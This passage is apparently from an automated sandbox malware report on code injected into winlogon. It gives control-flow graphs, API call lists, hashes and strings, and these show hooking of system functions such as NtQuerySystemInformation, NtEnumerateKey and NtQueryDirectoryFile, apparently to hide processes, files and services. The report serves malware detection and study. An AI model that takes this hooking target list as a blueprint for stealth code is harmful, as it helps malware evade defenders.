                                                  • Opcode Fuzzy Hash: 5cb5b95a7894899fc9eb5752d55467de447e254151c1921a767ae76168264666
                                                  • Instruction Fuzzy Hash: 1211AD2A328F5492EB149BA9F40836973A1F788F96F148038DE8E03B94EF3DC544CB00

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 57 225dc645f20-225dc645f47 58 225dc645f49-225dc645f58 57->58 59 225dc645f5b-225dc645f66 GetCurrentThreadId 57->59 58->59 60 225dc645f68-225dc645f6d 59->60 61 225dc645f72-225dc645f79 59->61 62 225dc64639f-225dc6463b6 call 225dc647d30 60->62 63 225dc645f8b-225dc645f9f 61->63 64 225dc645f7b-225dc645f86 call 225dc645d50 61->64 67 225dc645fae-225dc645fb4 63->67 64->62 70 225dc645fba-225dc645fc3 67->70 71 225dc646085-225dc6460a6 67->71 73 225dc64600a-225dc64607d call 225dc644900 call 225dc6448a0 call 225dc644860 70->73 74 225dc645fc5-225dc646008 call 225dc655470 70->74 76 225dc6460ac-225dc6460cc GetThreadContext 71->76 77 225dc64620f-225dc646220 call 225dc6478af 71->77 87 225dc646080 73->87 74->87 80 225dc64620a 76->80 81 225dc6460d2-225dc6460f3 76->81 91 225dc646225-225dc64622b 77->91 80->77 81->80 90 225dc6460f9-225dc646102 81->90 87->67 95 225dc646182-225dc646193 90->95 96 225dc646104-225dc646115 90->96 92 225dc646231-225dc646288 VirtualProtect FlushInstructionCache 91->92 93 225dc6462ee-225dc6462fe 91->93 97 225dc6462b9-225dc6462e9 call 225dc647c98 92->97 98 225dc64628a-225dc646294 92->98 102 225dc64630e-225dc64631a call 225dc6451e0 93->102 103 225dc646300-225dc646307 93->103 99 225dc646205 95->99 100 225dc646195-225dc6461b3 95->100 104 225dc646117-225dc64612c 96->104 105 225dc64617d 96->105 97->91 98->97 106 225dc646296-225dc6462b1 call 225dc644780 98->106 100->99 107 225dc6461b5-225dc646200 call 225dc643cf0 call 225dc6478cd 100->107 121 225dc64631f-225dc646325 102->121 103->102 109 225dc646309 call 225dc6447d0 103->109 104->105 111 225dc64612e-225dc646178 call 225dc643d60 SetThreadContext 104->111 105->99 106->97 107->99 109->102 111->105 122 225dc646367-225dc646385 121->122 123 225dc646327-225dc646365 ResumeThread call 225dc647c98 121->123 126 225dc646399 122->126 127 225dc646387-225dc646396 122->127 123->121 126->62 127->126
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: 963d1e48a3b0604ce5f35dcd82b15c0c5a6d24c3a92046ab449868edf58242d4
                                                  • Instruction ID: a7b5239b946ad419ba9bc596c6c6c91a2360651e6ce483a4791a5a7da8c1d152
                                                  • Opcode Fuzzy Hash: 963d1e48a3b0604ce5f35dcd82b15c0c5a6d24c3a92046ab449868edf58242d4
                                                  • Instruction Fuzzy Hash: 9BD1897A20CF9896DB71DF9AE49835A77A0F3C8B89F104156EA8E477A5DF38C541CB00

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 129 225dc6454c0-225dc6454ec 130 225dc6454fd-225dc645506 129->130 131 225dc6454ee-225dc6454f6 129->131 132 225dc645517-225dc645520 130->132 133 225dc645508-225dc645510 130->133 131->130 134 225dc645531-225dc64553a 132->134 135 225dc645522-225dc64552a 132->135 133->132 136 225dc64553c-225dc645541 134->136 137 225dc645546-225dc645551 GetCurrentThreadId 134->137 135->134 138 225dc645ac3-225dc645aca 136->138 139 225dc645553-225dc645558 137->139 140 225dc64555d-225dc645564 137->140 139->138 141 225dc645566-225dc64556c 140->141 142 225dc645571-225dc64557a 140->142 141->138 143 225dc64557c-225dc645581 142->143 144 225dc645586-225dc645592 142->144 143->138 145 225dc645594-225dc6455b9 144->145 146 225dc6455be-225dc645615 call 225dc645ad0 * 2 144->146 145->138 151 225dc64562a-225dc645633 146->151 152 225dc645617-225dc64561e 146->152 153 225dc645645-225dc64564e 151->153 154 225dc645635-225dc645642 151->154 155 225dc645626 152->155 156 225dc645620 152->156 157 225dc645663-225dc645688 call 225dc647c5c 153->157 158 225dc645650-225dc645660 153->158 154->153 155->151 160 225dc645696-225dc64569a 155->160 159 225dc6456a0-225dc6456a6 156->159 169 225dc64571d-225dc645732 call 225dc6440b0 157->169 170 225dc64568e 157->170 158->157 161 225dc6456d5-225dc6456db 159->161 162 225dc6456a8-225dc6456c4 call 225dc644780 159->162 160->159 166 225dc645705-225dc645718 161->166 167 225dc6456dd-225dc6456fc call 225dc647c98 161->167 162->161 173 225dc6456c6-225dc6456ce 162->173 166->138 167->166 176 225dc645741-225dc64574a 169->176 177 225dc645734-225dc64573c 169->177 170->160 173->161 178 225dc64575c-225dc6457aa call 225dc655b10 176->178 179 225dc64574c-225dc645759 176->179 177->160 182 225dc6457b2-225dc6457ba 178->182 179->178 183 225dc6458c7-225dc6458cf 182->183 184 225dc6457c0-225dc6458ab call 225dc647830 182->184 185 225dc6458d1-225dc6458e4 call 225dc644980 183->185 186 225dc645913-225dc64591b 183->186 194 225dc6458ad 184->194 195 225dc6458af-225dc6458be call 225dc644450 184->195 201 225dc6458e6 185->201 202 225dc6458e8-225dc645911 185->202 190 225dc645927-225dc645936 186->190 191 225dc64591d-225dc645925 186->191 192 225dc645938 190->192 193 225dc64593f 190->193 191->190 197 225dc645944-225dc645951 191->197 192->193 193->197 194->183 205 225dc6458c2 195->205 206 225dc6458c0 195->206 199 225dc645953 197->199 200 225dc645954-225dc6459a9 call 225dc655470 197->200 199->200 208 225dc6459ab-225dc6459b3 200->208 209 225dc6459b8-225dc645a51 call 225dc644900 call 225dc644860 VirtualProtect 200->209 201->186 202->183 205->182 206->183 214 225dc645a61-225dc645ac1 209->214 215 225dc645a53-225dc645a58 GetLastError 209->215 214->138 215->214
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: 2bfbce31d4c32bf389e85ea8546126df6045a4a000f84ffb86805c1e9a194d89
                                                  • Instruction ID: 2c6ede63a0b83698cf5a9ce628443843bd970848308fb0a6aa09a1edd7586ce4
                                                  • Opcode Fuzzy Hash: 2bfbce31d4c32bf389e85ea8546126df6045a4a000f84ffb86805c1e9a194d89
                                                  • Instruction Fuzzy Hash: F602C83A21DB9496E7A0CF99E49435AB7A1F3C5795F104055EA8E87BA8DF7CC484CF00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000003.1743112186.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_3_225dc610000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Protect$AllocLibraryLoad
                                                  • String ID:
                                                  • API String ID: 3316853933-0
                                                  • Opcode ID: 000990a0b745e2d7aebf751e9a901d84576f17a5eee71522b46ce82416c04370
                                                  • Instruction ID: 7c7ffc829931afebc84d2262f880a78010df723203b93f7f8f6b1151908b32a9
                                                  • Opcode Fuzzy Hash: 000990a0b745e2d7aebf751e9a901d84576f17a5eee71522b46ce82416c04370
                                                  • Instruction Fuzzy Hash: 1E91437AB12AA097EF658F69D408B69B3E1F744B9BF54C024DF0947B88DA38D852C710

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Virtual$AllocQuery
                                                  • String ID:
                                                  • API String ID: 31662377-0
                                                  • Opcode ID: b983b11adf99ec76272078e56f86ff06b3614e17bcbd6bd355fa3c20ccc27ce4
                                                  • Instruction ID: 51da0c04d0423afe520330715c7c16d57da11fddecb4fde2562bad409c3f9563
                                                  • Opcode Fuzzy Hash: b983b11adf99ec76272078e56f86ff06b3614e17bcbd6bd355fa3c20ccc27ce4
                                                  • Instruction Fuzzy Hash: 83312F2621EF9491EA31DB9DE05975E72A4F388B86F108576F6CE06B98DF3DC541CB00

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32 ref: 00000225DC643605
                                                  • PathFindFileNameW.SHLWAPI ref: 00000225DC643614
                                                    • Part of subcall function 00000225DC643C40: StrCmpNIW.SHLWAPI(?,?,?,00000225DC642513), ref: 00000225DC643C58
                                                    • Part of subcall function 00000225DC643B8C: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000225DC64362B), ref: 00000225DC643B9A
                                                    • Part of subcall function 00000225DC643B8C: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC64362B), ref: 00000225DC643BC8
                                                    • Part of subcall function 00000225DC643B8C: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC64362B), ref: 00000225DC643BEA
                                                    • Part of subcall function 00000225DC643B8C: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000225DC64362B), ref: 00000225DC643C05
                                                    • Part of subcall function 00000225DC643B8C: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000225DC64362B), ref: 00000225DC643C26
                                                  • CreateThread.KERNELBASE ref: 00000225DC64365B
                                                    • Part of subcall function 00000225DC641D48: GetCurrentThread.KERNEL32 ref: 00000225DC641D53
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                  • String ID:
                                                  • API String ID: 1683269324-0
                                                  • Opcode ID: cfb75781ef125e8798c35dece2b590244b14960149cb17afe32fff2217cf4a51
                                                  • Instruction ID: c5af6e518a3ef3f333baef8121736ea01690c6ccea3ae494c4bfc47224fe929b
                                                  • Opcode Fuzzy Hash: cfb75781ef125e8798c35dece2b590244b14960149cb17afe32fff2217cf4a51
                                                  • Instruction Fuzzy Hash: AF11757C62CF2672F764A7ECE40D7593290AB54B97F90D0B99907452D5EF7CC044CA00

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                  • String ID:
                                                  • API String ID: 3733156554-0
                                                  • Opcode ID: 7a96d56ab3a8e099e4dc89dc43dc6f1dccdbd8f276877131abc494c541a1ef3f
                                                  • Instruction ID: 697132d8e9726ec2c61c9b76a774a76ccc8ebd1ea889a09b6829c328c48bbc3d
                                                  • Opcode Fuzzy Hash: 7a96d56ab3a8e099e4dc89dc43dc6f1dccdbd8f276877131abc494c541a1ef3f
                                                  • Instruction Fuzzy Hash: 24F0173A62CE5491D6309B89E45834A77A0F3C8BD9F148152FA8E03BA9DB38C280CF00

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00000225DC641630: GetProcessHeap.KERNEL32 ref: 00000225DC64163B
                                                    • Part of subcall function 00000225DC641630: HeapAlloc.KERNEL32 ref: 00000225DC64164A
                                                    • Part of subcall function 00000225DC641630: RegOpenKeyExW.KERNELBASE ref: 00000225DC6416BA
                                                    • Part of subcall function 00000225DC641630: RegOpenKeyExW.KERNELBASE ref: 00000225DC6416E7
                                                    • Part of subcall function 00000225DC641630: RegCloseKey.ADVAPI32 ref: 00000225DC641701
                                                    • Part of subcall function 00000225DC641630: RegOpenKeyExW.KERNELBASE ref: 00000225DC641721
                                                    • Part of subcall function 00000225DC641630: RegCloseKey.KERNELBASE ref: 00000225DC64173C
                                                    • Part of subcall function 00000225DC641630: RegOpenKeyExW.KERNELBASE ref: 00000225DC64175C
                                                    • Part of subcall function 00000225DC641630: RegCloseKey.ADVAPI32 ref: 00000225DC641777
                                                    • Part of subcall function 00000225DC641630: RegOpenKeyExW.KERNELBASE ref: 00000225DC641797
                                                    • Part of subcall function 00000225DC641630: RegCloseKey.ADVAPI32 ref: 00000225DC6417B2
                                                    • Part of subcall function 00000225DC641630: RegOpenKeyExW.KERNELBASE ref: 00000225DC6417D2
                                                  • SleepEx.KERNEL32 ref: 00000225DC641AEB
                                                    • Part of subcall function 00000225DC641630: RegCloseKey.ADVAPI32 ref: 00000225DC6417ED
                                                    • Part of subcall function 00000225DC641630: RegOpenKeyExW.KERNELBASE ref: 00000225DC64180D
                                                    • Part of subcall function 00000225DC641630: RegCloseKey.ADVAPI32 ref: 00000225DC641828
                                                    • Part of subcall function 00000225DC641630: RegOpenKeyExW.KERNELBASE ref: 00000225DC641848
                                                    • Part of subcall function 00000225DC641630: RegCloseKey.ADVAPI32 ref: 00000225DC641863
                                                    • Part of subcall function 00000225DC641630: RegOpenKeyExW.KERNELBASE ref: 00000225DC641883
                                                    • Part of subcall function 00000225DC641630: RegCloseKey.ADVAPI32 ref: 00000225DC64189E
                                                    • Part of subcall function 00000225DC641630: RegCloseKey.KERNELBASE ref: 00000225DC6418A8
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                  • String ID:
                                                  • API String ID: 948135145-0
                                                  • Opcode ID: 64fb92cc953f313ae368503f7b994b04d0db7b05d41c96cf66c0a3f5624dce5c
                                                  • Instruction ID: 27b580bac4346b7386ec9c81778e63cdda75a631ef486782b913b86cc12abd57
                                                  • Opcode Fuzzy Hash: 64fb92cc953f313ae368503f7b994b04d0db7b05d41c96cf66c0a3f5624dce5c
                                                  • Instruction Fuzzy Hash: 22312F6D75CE2162FB549BAAC94839D33A4AB84BC2F04D0A19E4B87BE5FF30C850C350

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 410 225dc642bc8-225dc642c41 412 225dc642f5c-225dc642f7f 410->412 413 225dc642c47-225dc642c4d 410->413 413->412 414 225dc642c53-225dc642c56 413->414 414->412 415 225dc642c5c-225dc642c5f 414->415 415->412 416 225dc642c65-225dc642c75 GetModuleHandleA 415->416 417 225dc642c89 416->417 418 225dc642c77-225dc642c87 GetProcAddress 416->418 419 225dc642c8c-225dc642caa 417->419 418->419 419->412 421 225dc642cb0-225dc642ccf StrCmpNIW 419->421 421->412 422 225dc642cd5-225dc642cd9 421->422 422->412 423 225dc642cdf-225dc642ce9 422->423 423->412 424 225dc642cef-225dc642cf6 423->424 424->412 425 225dc642cfc-225dc642d0f 424->425 426 225dc642d11-225dc642d1d 425->426 427 225dc642d1f 425->427 428 225dc642d22-225dc642d26 426->428 427->428 429 225dc642d36 428->429 430 225dc642d28-225dc642d34 428->430 431 225dc642d39-225dc642d43 429->431 430->431 432 225dc642e29-225dc642e2d 431->432 433 225dc642d49-225dc642d4c 431->433 436 225dc642e33-225dc642e36 432->436 437 225dc642f4e-225dc642f56 432->437 434 225dc642d5e-225dc642d68 433->434 435 225dc642d4e-225dc642d5b call 225dc64193c 433->435 441 225dc642d6a-225dc642d77 434->441 442 225dc642d9c-225dc642da6 434->442 435->434 438 225dc642e47-225dc642e51 436->438 439 225dc642e38-225dc642e44 call 225dc64193c 436->439 437->412 437->425 444 225dc642e81-225dc642e84 438->444 445 225dc642e53-225dc642e60 438->445 439->438 441->442 447 225dc642d79-225dc642d86 441->447 448 225dc642dd6-225dc642dd9 442->448 449 225dc642da8-225dc642db5 442->449 454 225dc642e86-225dc642e8f call 225dc641bd0 444->454 455 225dc642e91-225dc642e9e lstrlenW 444->455 445->444 453 225dc642e62-225dc642e6f 445->453 456 225dc642d89-225dc642d8f 447->456 451 225dc642ddb-225dc642de5 call 225dc641bd0 448->451 452 225dc642de7-225dc642df4 lstrlenW 448->452 449->448 457 225dc642db7-225dc642dc4 449->457 451->452 465 225dc642e1f-225dc642e24 451->465 461 225dc642df6-225dc642e05 call 225dc641c08 452->461 462 225dc642e07-225dc642e19 call 225dc643c40 452->462 460 225dc642e72-225dc642e78 453->460 454->455 472 225dc642ec6-225dc642ed1 454->472 466 225dc642eb1-225dc642ebb call 225dc643c40 455->466 467 225dc642ea0-225dc642eaf call 225dc641c08 455->467 464 225dc642d95-225dc642d9a 456->464 456->465 458 225dc642dc7-225dc642dcd 457->458 458->465 468 225dc642dcf-225dc642dd4 458->468 471 225dc642e7a-225dc642e7f 460->471 460->472 461->462 461->465 462->465 476 225dc642ebe-225dc642ec0 462->476 464->442 464->456 465->476 466->476 467->466 467->472 468->448 468->458 471->444 471->460 479 225dc642f48-225dc642f4c 472->479 480 225dc642ed3-225dc642ed7 472->480 476->437 476->472 479->437 484 225dc642ed9-225dc642edd 480->484 485 225dc642edf-225dc642ef9 call 225dc655470 480->485 484->485 486 225dc642efc-225dc642eff 484->486 485->486 489 225dc642f01-225dc642f1f call 225dc655470 486->489 490 225dc642f22-225dc642f25 486->490 489->490 490->479 492 225dc642f27-225dc642f45 call 225dc655470 490->492 492->479
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 5fbd9173ce4d782f6a43f1b6ae1fcce4f28eac928785eaf1fb737f6660f8b0ea
                                                  • Instruction ID: 4104d15f393b1069a0047c804a7d5bc88260b67d21df8f33570d6b7e3ce58b13
                                                  • Opcode Fuzzy Hash: 5fbd9173ce4d782f6a43f1b6ae1fcce4f28eac928785eaf1fb737f6660f8b0ea
                                                  • Instruction Fuzzy Hash: FAB1C67A22CE70A2EB568FE9D40876973A4FB44B86F64D056EE0A53794EF34CC81C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 9234f04ebf3d0d18ada26ad48c251ddc084bcc865350783e627834a553364bb5
                                                  • Instruction ID: 6c1aa55fe748a0e492353d209b2007dd106009ccbc860e23c8e2a78945f216c2
                                                  • Opcode Fuzzy Hash: 9234f04ebf3d0d18ada26ad48c251ddc084bcc865350783e627834a553364bb5
                                                  • Instruction Fuzzy Hash: 05318176228F909AEB608FA4E8583DE3360F788705F54812ADB4E47B95DF38C548CB10
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 25459dfd405c3fd6abe62832c5e49632febe87f8ccdadd93aea5d47d5ebeda6d
                                                  • Instruction ID: 63a30fc82cdc159654185f8775d8f8f05fb0fea0a27c69e9bb61532a1c6e85f6
                                                  • Opcode Fuzzy Hash: 25459dfd405c3fd6abe62832c5e49632febe87f8ccdadd93aea5d47d5ebeda6d
                                                  • Instruction Fuzzy Hash: 2531843A628F9096EB60CF69E8483DE73A4F789759F504126EB9E43B94DF38C145CB00

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 00000225DC641D53
                                                    • Part of subcall function 00000225DC64208C: GetModuleHandleA.KERNEL32(?,?,?,00000225DC641D85), ref: 00000225DC6420A4
                                                    • Part of subcall function 00000225DC64208C: GetProcAddress.KERNEL32(?,?,?,00000225DC641D85), ref: 00000225DC6420B5
                                                    • Part of subcall function 00000225DC645F20: GetCurrentThreadId.KERNEL32 ref: 00000225DC645F5B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                  • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 4175298099-1819131285
                                                  • Opcode ID: ec902621774e6c93ddf96b1cef49485a110a34d9b18634e59d3ce01917ac58d9
                                                  • Instruction ID: 7d1cae3f2418930990717b6b1fec770be8d99d19fae14956f544e26bba8ffa25
                                                  • Opcode Fuzzy Hash: ec902621774e6c93ddf96b1cef49485a110a34d9b18634e59d3ce01917ac58d9
                                                  • Instruction Fuzzy Hash: 024162AC518D6AF0FE06DFEDE8597D53361AB44B87FA0D4A3D40A035A19E7CC649C390

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2961718158.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                  • Associated: 00000006.00000002.2960781892.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2962898903.00000225DC657000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2963901571.00000225DC662000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2964842129.00000225DC664000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000006.00000002.2965939163.00000225DC66A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_225dc640000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: e2ed30d8db31d81b4c0daa00d2e475a39dc02a101f7e26d9b862c19419363001
                                                  • Instruction ID: b4a5effe6859a9edb53c16fadcf7baa9684dba7bf273bcae79a503416d6d8523
                                                  • Opcode Fuzzy Hash: e2ed30d8db31d81b4c0daa00d2e475a39dc02a101f7e26d9b862c19419363001
